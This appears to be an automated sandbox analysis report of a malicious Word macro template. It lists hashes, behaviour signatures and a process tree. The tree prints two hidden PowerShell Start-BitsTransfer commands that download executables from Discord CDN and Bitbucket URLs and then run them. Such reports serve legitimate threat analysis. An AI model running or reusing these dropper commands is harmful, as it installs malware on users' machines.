Analysis

  • max time kernel
    133s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2024 02:36

General

  • Target

    example.dotm

  • Size

    16KB

  • MD5

    1aae26fe5d7b7dc4d6794a7828aecedc

  • SHA1

    fbb8c6f45f53dc80e276a72cf9f567054b65c206

  • SHA256

    1d473e82efa66368ffb4ce8f5eb947296c8e8d3febbe3a6283857da6fb1cc7d5

  • SHA512

    2036693971d4710c9d59c569a8a8fef98ee33422b324c343c07aac9fb67500f82e54c6904054f65a7294dbbc745773fdbf6a6051aa7a71ac8b04b9c3dcf5c6e0

  • SSDEEP

    384:tBt67TB+TZ2T/aNxt/ZtNNei/eX+30Oncsqf:R6PaGIxllNeAeX+3BcBf

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://bitbucket.org/damnman/damn/downloads/simplecryptservice.docx

Extracted

Language
ps1
Source
URLs
exe.dropper

https://cdn.discordapp.com/attachments/1074394309446619298/1085646503940464700/putty.exe

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\example.dotm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2952
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://cdn.discordapp.com/attachments/1074394309446619298/1085646503940464700/putty.exe -Dest C:\Users\Public\putty.exe;C:\Users\Public\putty.exe
      2⤵
      • Process spawned unexpected child process
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://bitbucket.org/damnman/damn/downloads/simplecryptservice.docx -Dest C:\Users\Public\simplecryptservice.docx;C:\Users\Public\simplecryptservice.docx
      2⤵
      • Process spawned unexpected child process
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2800

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    61e2e57471d559f5f6813c0a7995c075

    SHA1

    33c621541bc0892ddab1b65345a348c14af566e5

    SHA256

    c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d

    SHA512

    9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    1d94235176612f6abfdfa619ec6c4e66

    SHA1

    300ed4e2883aa3e30fde5f45daf6f84d37f8a57a

    SHA256

    df30e6f8bd5a62974e2b0823286b2a84f4e63beb1250cbb58cae2e10a6e1af5c

    SHA512

    4b416ab23c554dff1d83e7ad6c4a4cb4ab259b832e04af591557570d8625e9e8b928ed2d5bfc053d84d0ebe8f3870ee71c458ffe532963f79b753e750b6819e4

  • C:\Users\Admin\AppData\Local\Temp\TCDE303.tmp\gb.xsl

    Filesize

    262KB

    MD5

    51d32ee5bc7ab811041f799652d26e04

    SHA1

    412193006aa3ef19e0a57e16acf86b830993024a

    SHA256

    6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

    SHA512

    5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fxi4bxqf.wc4.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    6KB

    MD5

    7b2ec28de6e6464c0efd0ed57d149946

    SHA1

    586a72e4b8324710c52fdc8ab9da9d49d67706fa

    SHA256

    3ecfaed27f3c46a3aa2a958aea7a4c3d317b3cfcb0ea86375825dc4eed709c3a

    SHA512

    4ab4047355c41cfcc67cb9d19332e2092696f1a4a1e9023e4a91ce3ce94c513bfd0f8b4c9323422d927d133e88d174e6a8dbd699abb91df1708ce31c44409abd

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    6KB

    MD5

    a86c68c9e4166329b14b63a95ac1d804

    SHA1

    71bd2f004e8a440ba57e55148b6c95f9b7876156

    SHA256

    96abd542ea3e65c821f57afc7b564c35f35dfaa3fc6a0e009bb4156527f69409

    SHA512

    1dc981c54481bef11a4046d7285ef746d86a8c228dd6fb8607db95d738fd69ca2f020cc1c7d74758dfcf110e52546f4d1f1d8a759c05124e10a1a60e7c272fbb

  • memory/2800-92-0x0000027CFB810000-0x0000027CFB824000-memory.dmp

    Filesize

    80KB

  • memory/2800-91-0x0000027CFB7C0000-0x0000027CFB7E6000-memory.dmp

    Filesize

    152KB

  • memory/2800-72-0x0000027CFB2F0000-0x0000027CFB312000-memory.dmp

    Filesize

    136KB

  • memory/2952-20-0x00007FFB2E340000-0x00007FFB2E350000-memory.dmp

    Filesize

    64KB

  • memory/2952-9-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-11-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-12-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-14-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-13-0x00007FFB2E340000-0x00007FFB2E350000-memory.dmp

    Filesize

    64KB

  • memory/2952-15-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-16-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-17-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-19-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-18-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-0-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

    Filesize

    64KB

  • memory/2952-50-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-57-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-58-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-10-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-6-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-8-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

    Filesize

    64KB

  • memory/2952-7-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-5-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

    Filesize

    64KB

  • memory/2952-4-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-93-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-94-0x00007FFB70A6D000-0x00007FFB70A6E000-memory.dmp

    Filesize

    4KB

  • memory/2952-95-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-3-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

    Filesize

    64KB

  • memory/2952-2-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

    Filesize

    64KB

  • memory/2952-101-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-102-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-103-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-109-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

    Filesize

    2.0MB

  • memory/2952-1-0x00007FFB70A6D000-0x00007FFB70A6E000-memory.dmp

    Filesize

    4KB